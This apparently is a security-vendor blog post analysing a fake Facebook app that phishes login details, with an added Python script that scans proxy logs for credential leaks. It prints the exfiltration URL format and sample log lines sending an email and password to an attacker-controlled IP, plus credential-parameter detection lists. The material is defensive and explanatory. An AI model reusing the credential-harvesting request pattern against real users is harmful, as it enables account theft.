Recently, we came across an application that displays the message “Tornado Randomly Appears During Soccer Game” on Facebook.
Clicking on the message forces the download of a script from http://<IP Removed>/fb2.js, which displays a Facebook login message. If the user is already logged in to Facebook, the malicious app logs the user out and asks him/her to log in again.
When the user clicks on the “Login” button, the login form is displayed.
When the user enters login details and clicks on the Login button, the fake application sends two POST requests: one to Facebook.com, and the other to the malicious server. The request sent to the malicious server has the following format:
http://IPRemoved/log.php?email=<email address>&pass=<password>
Standard best-practice advice is to check the browser's address bar to confirm where a URL leads, but that isn't enough in this case. The address bar shows apps.facebook.com while the login form is displayed, even though the credentials are also posted to the malicious server.
Fiddler logs captured during analysis show the email addresses and passwords being posted to the malicious server.
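The two-destination POST described above is exactly what a proxy or web-gateway log can expose: a credential-bearing request whose host is not the site shown in the address bar. The script below is an added example, not code from the original post or from Symantec. It scans constructed log lines in a simplified "METHOD URL [body]" format (not Fiddler's real export format), using a placeholder documentation IP in place of the removed address, and flags any request that carries credential-like parameters to a host outside a trusted list, over plain HTTP, or in the query string. The trusted-host list and parameter names are assumptions for the example.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample log in a simplified "METHOD URL [body]" format.
# The IP address is a placeholder from the documentation range, not the real server.
SAMPLE_LOG = """\
POST https://www.facebook.com/login.php email=victim%40example.com&pass=hunter2
POST http://198.51.100.23/log.php?email=victim%40example.com&pass=hunter2
GET http://198.51.100.23/fb2.js
POST https://apps.facebook.com/someapp/ token=abc
"""

# Parameter names that typically carry credentials (assumed list for the example).
CREDENTIAL_KEYS = {"email", "pass", "password", "passwd", "login", "username"}
# Hosts that may legitimately receive Facebook credentials (assumed list).
TRUSTED_HOSTS = {"www.facebook.com", "apps.facebook.com"}


def parse_line(line):
    """Split one log line into (method, url, body); body may be empty."""
    parts = line.split(maxsplit=2)
    method, url = parts[0], parts[1]
    body = parts[2] if len(parts) > 2 else ""
    return method, url, body


def param_keys(encoded):
    """Lower-cased parameter names from a URL-encoded query or form body."""
    return {k.lower() for k in parse_qs(encoded, keep_blank_values=True)}


def credential_params(url, body):
    """Return the credential-like parameter names found in the query string or body."""
    query = urlsplit(url).query
    return (param_keys(query) | param_keys(body)) & CREDENTIAL_KEYS


def is_trusted(host):
    """True if the host is an allowed credential destination."""
    host = host.lower()
    return host in TRUSTED_HOSTS or host.endswith(".facebook.com")


def find_credential_leaks(log_text):
    """Return one alert dict per request that sends credentials somewhere suspicious."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        method, url, body = parse_line(line)
        keys = credential_params(url, body)
        if not keys:
            continue  # no credential-like parameters, nothing to judge
        parts = urlsplit(url)
        host = parts.hostname or ""
        reasons = []
        if not is_trusted(host):
            reasons.append("untrusted host")
        if parts.scheme != "https":
            reasons.append("plaintext http")
        if keys & param_keys(parts.query):
            reasons.append("credentials in query string")
        if reasons:
            alerts.append({"method": method, "host": host,
                           "params": sorted(keys), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_credential_leaks(SAMPLE_LOG):
        print(alert)
```

Run against the sample, only the request to the placeholder IP is reported; the legitimate login POST to www.facebook.com is left alone because it goes to a trusted host, over HTTPS, with the credentials in the body. In a real deployment the same three checks map onto gateway or DLP rules: credentials leaving for an unexpected host, credentials over plaintext HTTP, and credentials in a URL (which also end up in server and proxy access logs).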
The bogus app also "likes" the link in an automatic post, which is displayed on the user's profile.
We have also observed a similar attack hosted on the same IP address. It displays a different message, “Video: This is the best April Fools' prank ever!”, but employs the same technique described above to steal usernames and passwords for users’ Facebook accounts.
The good news is that Symantec customers are protected from this attack. We at Symantec urge the readers to install all security patches and definitions regularly.